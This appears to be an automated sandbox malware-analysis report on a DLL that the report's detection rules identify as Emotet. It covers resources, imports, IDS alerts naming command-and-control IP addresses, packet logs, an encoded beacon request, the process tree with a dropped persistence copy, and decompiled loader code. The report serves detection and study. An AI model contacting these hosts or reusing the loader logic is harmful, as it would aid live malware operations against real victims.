RT_ICON	0x648d0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 61695, next used block 4294934272	Russian	Russia
RT_ICON	0x68af8	0x25a8	data	Russian	Russia
RT_ICON	0x6b0a0	0x10a8	data	Russian	Russia
RT_ICON	0x6c148	0x468	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_GROUP_ICON	0x6c5b0	0x84	data	Russian	Russia
RT_VERSION	0x612b0	0x200	data	Russian	Russia
RT_MANIFEST	0x6c638	0x17d	XML 1.0 document text	English	United States

Imports

DLL

Import

KERNEL32.dll

InterlockedFlushSList, GetProcessHeap, HeapAlloc, HeapFree, GetLastError, GetCommandLineA, ExitProcess, GetModuleHandleA, GetProcAddress, CloseHandle, TerminateProcess, WaitForSingleObject, VirtualProtect, SetLastError, VirtualFree, VirtualAlloc, LoadLibraryA, GetNativeSystemInfo, FreeLibrary, IsBadReadPtr, GetCurrentProcessId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, WriteConsoleW, DecodePointer, RtlUnwind, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, RaiseException, GetModuleHandleExW, GetModuleFileNameW, LCMapStringW, GetStdHandle, GetFileType, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, SetStdHandle, SetFilePointerEx, GetStringTypeW, HeapSize, CreateFileW

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x1000209d

Version Infos

Description	Data
LegalCopyright	Copyright (C) 2021
ProductVersion	1.0.0.1
FileDescription	Application
FileVersion	1.0.0.1
CompanyName	A company
Translation	0x0419 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/24/21-16:55:38.215416	TCP	2404334	ET CNC Feodo Tracker Reported CnC Server TCP group 18	49761	443	192.168.2.6	51.178.61.60
11/24/21-16:55:38.808048	TCP	2404312	ET CNC Feodo Tracker Reported CnC Server TCP group 7	49762	80	192.168.2.6	168.197.250.14
11/24/21-16:55:40.651171	TCP	2404332	ET CNC Feodo Tracker Reported CnC Server TCP group 17	49763	8080	192.168.2.6	45.79.33.48
11/24/21-16:56:02.741600	TCP	2404322	ET CNC Feodo Tracker Reported CnC Server TCP group 12	49767	8080	192.168.2.6	196.44.98.190
11/24/21-16:56:23.809188	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49774	7080	192.168.2.6	177.72.80.14
11/24/21-16:56:24.351151	TCP	2021013	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex/Trickbot CnC)	7080	49774	177.72.80.14	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 16:55:38.215415955 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.215490103 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.215607882 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.236891031 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.236908913 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.341902971 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.342008114 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.645982981 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.646009922 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.646619081 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.646703959 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.650835037 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.692864895 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.744520903 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.744627953 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.744628906 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.744680882 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.771979094 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.772010088 CET	443	49761	51.178.61.60	192.168.2.6
Nov 24, 2021 16:55:38.772027016 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.772079945 CET	49761	443	192.168.2.6	51.178.61.60
Nov 24, 2021 16:55:38.808048010 CET	49762	80	192.168.2.6	168.197.250.14
Nov 24, 2021 16:55:39.079534054 CET	80	49762	168.197.250.14	192.168.2.6
Nov 24, 2021 16:55:39.592206955 CET	49762	80	192.168.2.6	168.197.250.14
Nov 24, 2021 16:55:39.863593102 CET	80	49762	168.197.250.14	192.168.2.6
Nov 24, 2021 16:55:40.373620987 CET	49762	80	192.168.2.6	168.197.250.14
Nov 24, 2021 16:55:40.645042896 CET	80	49762	168.197.250.14	192.168.2.6
Nov 24, 2021 16:55:40.651170969 CET	49763	8080	192.168.2.6	45.79.33.48
Nov 24, 2021 16:55:43.639487982 CET	49763	8080	192.168.2.6	45.79.33.48
Nov 24, 2021 16:55:49.655695915 CET	49763	8080	192.168.2.6	45.79.33.48
Nov 24, 2021 16:56:02.741600037 CET	49767	8080	192.168.2.6	196.44.98.190
Nov 24, 2021 16:56:05.766299963 CET	49767	8080	192.168.2.6	196.44.98.190
Nov 24, 2021 16:56:11.782428026 CET	49767	8080	192.168.2.6	196.44.98.190
Nov 24, 2021 16:56:23.809187889 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:24.063883066 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:24.067997932 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:24.068603992 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:24.323093891 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:24.351150990 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:24.351186991 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:24.351284027 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:27.923861980 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:28.176820993 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:28.176973104 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:28.177799940 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:28.469199896 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:29.336599112 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:29.336731911 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:32.340235949 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:32.340604067 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:56:32.340751886 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:56:32.340864897 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:57:28.301615000 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:57:28.301664114 CET	49774	7080	192.168.2.6	177.72.80.14
Nov 24, 2021 16:57:28.552778959 CET	7080	49774	177.72.80.14	192.168.2.6
Nov 24, 2021 16:57:28.552874088 CET	49774	7080	192.168.2.6	177.72.80.14

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49761	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-24 15:55:38 UTC	OUT	GET /wxXNBTtFVptEPyBMyhxzytUrLNSymmMWHdjZgweBcTxtKLUZGczVLXNxnireROs HTTP/1.1 Cookie: JmIuwWBWPToZ=XDGTMkmFZ9hr0CeEgG7gEpD9hs4Omotho6+57napLIrRc+yLhr6jDd+kXDv4veMC3uDo48E0KYz8mat8uVA0WXuFnsw4hzFORPBn7MrucHVcn/hm73RFPQ0NYNqRr6rNpXumiYPSOimYLiR2Tu6sMdw82U3DBUuDHRe9h1WQb6f1GDhoy5QtZ0z4paXtdMAW8mO9u70ywe2JFmJ1lqhLDJPKOuQAbbEec0hu7deLYD9sE1A= Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-24 15:55:38 UTC	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 24 Nov 2021 15:55:38 GMT Content-Type: text/html Content-Length: 162 Connection: close
2021-11-24 15:55:38 UTC	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5848 Parent PID: 5440

General

Start time:	16:55:25
Start date:	24/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll"
Imagebase:	0x3b0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4828 Parent PID: 5848

General

Start time:	16:55:25
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5116 Parent PID: 5848

General

Start time:	16:55:26
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4624 Parent PID: 4828

General

Start time:	16:55:26
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",#1
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.362028571.0000000003516000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4692 Parent PID: 5116

General

Start time:	16:55:26
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\pYebrdRKvR.dll,Control_RunDLL
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.360524597.0000000000A76000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.364197169.0000000000A3A000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5808 Parent PID: 4624

General

Start time:	16:55:27
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\pYebrdRKvR.dll",Control_RunDLL
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000003.361688769.0000000000A46000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.362088501.0000000000A46000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4248 Parent PID: 4692

General

Start time:	16:55:28
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Olcnhkjrspgysi\kpevmak.bsr",xeRCFlLGA
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.367502574.0000000003696000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4316 Parent PID: 4248

General

Start time:	16:55:30
Start date:	24/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Olcnhkjrspgysi\kpevmak.bsr",Control_RunDLL
Imagebase:	0x1160000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.882777684.0000000000D12000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000003.615469269.0000000000D12000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 3216 Parent PID: 560

General

Start time:	16:55:30
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5196 Parent PID: 560

General

Start time:	16:55:51
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6988 Parent PID: 560

General

Start time:	16:56:07
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6644 Parent PID: 560

General

Start time:	16:56:26
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6768 Parent PID: 560

General

Start time:	16:56:40
Start date:	24/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 5116 Parent PID: 5848 rundll32.exeCOMMON

Executed Functions

Function 6F32116B, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6F32116B() {
				void* _v3;
				CHAR* _v8;
				_Unknown_base(*)()* _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v28;
				char _v29;
				short _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				char _v43;
				char _v44;
				intOrPtr _v48;
				char _v52;
				struct _PROCESS_INFORMATION _v68;
				struct _STARTUPINFOA _v136;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t47;
				signed char _t53;
				signed int _t54;
				signed int* _t55;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t78;

				_push(cs);
				asm("enter 0x7df0, 0xa3");
				asm("fst qword [eax-0x2f]");
				asm("loope 0x62");
				_t67 =  *((_t63 &  *(_t63 + 0x64)) - 0x74fe66af) * 0xffffffc4;
				asm("in al, dx");
				_t54 = _t65 % _t53;
				asm("loopne 0xffffffd3");
				asm("scasd");
				asm("sbb [ebp+0x2830a69e], edx");
				asm("das");
				asm("out dx, al");
				_t55 = _t54 + 1;
				asm("sbb ebx, [eax]");
				asm("adc eax, 0x7f857c52");
				asm("aad 0xf2");
				_v52 = 0x6e72656b;
				_v48 = 0x32336c65;
				asm("aam 0x65");
				asm("insb");
				_t78 = _t67 ^  *_t55;
				_v44 = 0;
				_v43 = 0x43746547;
				if(_t78 != 0) {
					_v39 = 0x616d6d6f;
					_v35 = 0x694c646e;
					_v31 = 0x656e;
					_v29 = 0x41;
					_v28 = 0;
					_v27 = 0x61657243;
					_v23 = 0x72506574;
					_v19 = 0x7365636f;
					_v15 = 0x4173;
					_v13 = 0;
					_v12 = 0;
					_v8 = 0;
				}
				asm("cld");
				 *0xc3f0a76e =  *0xc3f0a76e + 0xc3f0a76e;
				 *0xc3f0a76e =  *0xc3f0a76e + 0xc3f0a76e;
				E6F33C640(0xc3f0a76e);
				E6F321426( &_v136, 0, 0x44);
				E6F321426( &_v68, 0, 0x10);
				_t26 =  &_v52; // 0x6e72656b
				_t45 = GetModuleHandleA(_t26);
				_t27 =  &_v43; // 0x43746547
				_v12 = GetProcAddress(_t45, _t27);
				_t47 = _t45;
				_t29 =  &_v27; // 0x61657243
				_v8 = GetProcAddress(_t47, _t29);
				if(CreateProcessA(0, _v12(), 0, 0, 1, 0, 0, 0,  &_v136,  &_v68) != 0) {
					 *0x6f366060 = _v68.hProcess;
					E6F33C650();
				}
				E6F33C630();
				L9:
				goto L9;
			}

0x6f32116b
0x6f32116c
0x6f321173
0x6f321176
0x6f321179
0x6f321180
0x6f321181
0x6f321183
0x6f321185
0x6f321188
0x6f32118e
0x6f32118f
0x6f321190
0x6f321191
0x6f321193
0x6f32119a
0x6f3211ad
0x6f3211b4
0x6f3211b6
0x6f3211b8
0x6f3211b9
0x6f3211bb
0x6f3211bf
0x6f3211c3
0x6f3211c6
0x6f3211cd
0x6f3211d4
0x6f3211da
0x6f3211de
0x6f3211e2
0x6f3211e9
0x6f3211f0
0x6f3211f7
0x6f3211fd
0x6f321201
0x6f321208
0x6f321208
0x6f32120a
0x6f32120b
0x6f32120d
0x6f32120f
0x6f32121f
0x6f32122f
0x6f321237
0x6f32123b
0x6f321242
0x6f32124d
0x6f321250
0x6f321251
0x6f32125c
0x6f321281
0x6f321286
0x6f32128b
0x6f32128b
0x6f321290
0x6f321295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F32123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F321247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F321256
CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,CreateProcessA), ref: 6F32127C

Strings

sA, xrefs: 6F3211F7
kernel32, xrefs: 6F321237, 6F32123A
A, xrefs: 6F3211D9
GetCommandLineCreateProcessA, xrefs: 6F321242, 6F321245

Memory Dump Source

Source File: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleModuleProcess
String ID: A$GetCommandLineCreateProcessA$kernel32$sA
API String ID: 1919063930-849291149
Opcode ID: 9352c70426581eb63cceac02223b3f5fab26c80392ed1ed37bd6cd70a9fe40f3
Instruction ID: a28bfd615c7ef67893b6f0c08bf717d89422fb8b1cce302dafc2448e74b6c939
Opcode Fuzzy Hash: 9352c70426581eb63cceac02223b3f5fab26c80392ed1ed37bd6cd70a9fe40f3
Instruction Fuzzy Hash: 1331CEB1D04359EEEB00EFA4CE45BEDBBB5AF04B00F108449E5406B280C7B65644CB99

Uniqueness

Uniqueness Score: -1.00%

Function 6F321035, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 128
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F321035(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, void* _a1) {
				void* _v3;
				void* _v8;
				void* _v12;
				void* _v13;
				void* _v15;
				void* _v19;
				void* _v23;
				void* _v27;
				void* _v28;
				void* _v29;
				void* _v31;
				void* _v35;
				void* _v39;
				void* _v43;
				void* _v44;
				void* _v52;
				void* _v64;
				void* _v68;
				void* _v69;
				void* _v93;
				void* _v136;
				void* _t75;
				void* _t81;
				void* _t85;
				void* _t94;
				void* _t109;

				_t94 = __edi;
				_t85 = __edx;
				_t81 = __ecx;
				_t75 = __ebx;
				_t109 = __eax - 0xad9570c6;
			}

0x6f321035
0x6f321035
0x6f321035
0x6f321035
0x6f321035

Strings

sA, xrefs: 6F3211F7
kernel32, xrefs: 6F321237, 6F32123A
GetCommandLineCreateProcessA, xrefs: 6F321242, 6F321245

Memory Dump Source

Source File: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367132433.000000006F366000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367137630.000000006F367000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367176524.000000006F37E000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367184229.000000006F381000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: GetCommandLineCreateProcessA$kernel32$sA
API String ID: 0-1906453927
Opcode ID: 98f8a83beb92973e2dbab4206cd41662908236a6522854c43889c33a5288a771
Instruction ID: 24b324e68a668ccbc399ba02abe88fd64cf661b0c501cac49d2a838d0d6c2e2d
Opcode Fuzzy Hash: 98f8a83beb92973e2dbab4206cd41662908236a6522854c43889c33a5288a771
Instruction Fuzzy Hash: 74412271D48358EBEB10EFB4C845BEEBBF9AF45B04F10854CE140AB280C3B59A45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6F3211A4, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6F3211A4() {
				void* _v3;
				CHAR* _v8;
				_Unknown_base(*)()* _v12;
				char _v13;
				short _v15;
				intOrPtr _v19;
				intOrPtr _v23;
				char _v27;
				char _v28;
				char _v29;
				short _v31;
				intOrPtr _v35;
				intOrPtr _v39;
				char _v43;
				char _v44;
				intOrPtr _v48;
				char _v52;
				struct _PROCESS_INFORMATION _v68;
				struct _STARTUPINFOA _v136;
				intOrPtr* _t29;
				struct HINSTANCE__* _t33;
				struct HINSTANCE__* _t35;
				signed int* _t40;
				signed int _t48;
				signed int _t54;

				_v52 = 0x6e72656b;
				_v48 = 0x32336c65;
				asm("aam 0x65");
				asm("insb");
				_t54 = _t48 ^  *_t40;
				_v44 = 0;
				_v43 = 0x43746547;
				if(_t54 != 0) {
					_v39 = 0x616d6d6f;
					_v35 = 0x694c646e;
					_v31 = 0x656e;
					_v29 = 0x41;
					_v28 = 0;
					_v27 = 0x61657243;
					_v23 = 0x72506574;
					_v19 = 0x7365636f;
					_v15 = 0x4173;
					_v13 = 0;
					_v12 = 0;
					_v8 = 0;
				}
				asm("cld");
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				E6F33C640(_t29);
				E6F321426( &_v136, 0, 0x44);
				E6F321426( &_v68, 0, 0x10);
				_t19 =  &_v52; // 0x6e72656b
				_t33 = GetModuleHandleA(_t19);
				_t20 =  &_v43; // 0x43746547
				_v12 = GetProcAddress(_t33, _t20);
				_t35 = _t33;
				_t22 =  &_v27; // 0x61657243
				_v8 = GetProcAddress(_t35, _t22);
				if(CreateProcessA(0, _v12(), 0, 0, 1, 0, 0, 0,  &_v136,  &_v68) != 0) {
					 *0x6f366060 = _v68.hProcess;
					E6F33C650();
				}
				E6F33C630();
				L7:
				goto L7;
			}

0x6f3211ad
0x6f3211b4
0x6f3211b6
0x6f3211b8
0x6f3211b9
0x6f3211bb
0x6f3211bf
0x6f3211c3
0x6f3211c6
0x6f3211cd
0x6f3211d4
0x6f3211da
0x6f3211de
0x6f3211e2
0x6f3211e9
0x6f3211f0
0x6f3211f7
0x6f3211fd
0x6f321201
0x6f321208
0x6f321208
0x6f32120a
0x6f32120b
0x6f32120d
0x6f32120f
0x6f32121f
0x6f32122f
0x6f321237
0x6f32123b
0x6f321242
0x6f32124d
0x6f321250
0x6f321251
0x6f32125c
0x6f321281
0x6f321286
0x6f32128b
0x6f32128b
0x6f321290
0x6f321295
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6F32123B
GetProcAddress.KERNEL32(00000000,GetCommandLineCreateProcessA), ref: 6F321247
GetProcAddress.KERNEL32(?,CreateProcessA), ref: 6F321256
CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,CreateProcessA), ref: 6F32127C

Part of subcall function 6F33C650: ExitProcess.KERNEL32 ref: 6F33C657

Strings

sA, xrefs: 6F3211F7
kernel32, xrefs: 6F321237, 6F32123A
GetCommandLineCreateProcessA, xrefs: 6F321242, 6F321245

Memory Dump Source

Source File: 00000003.00000002.366972157.000000006F321000.00000080.00020000.sdmp, Offset: 6F320000, based on PE: true

Associated: 00000003.00000002.366954851.000000006F320000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.366978362.000000006F322000.00000020.00020000.sdmp Download File
Associated: 00000003.00000002.367060511.000000006F348000.00000002.00020000.sdmp Download File
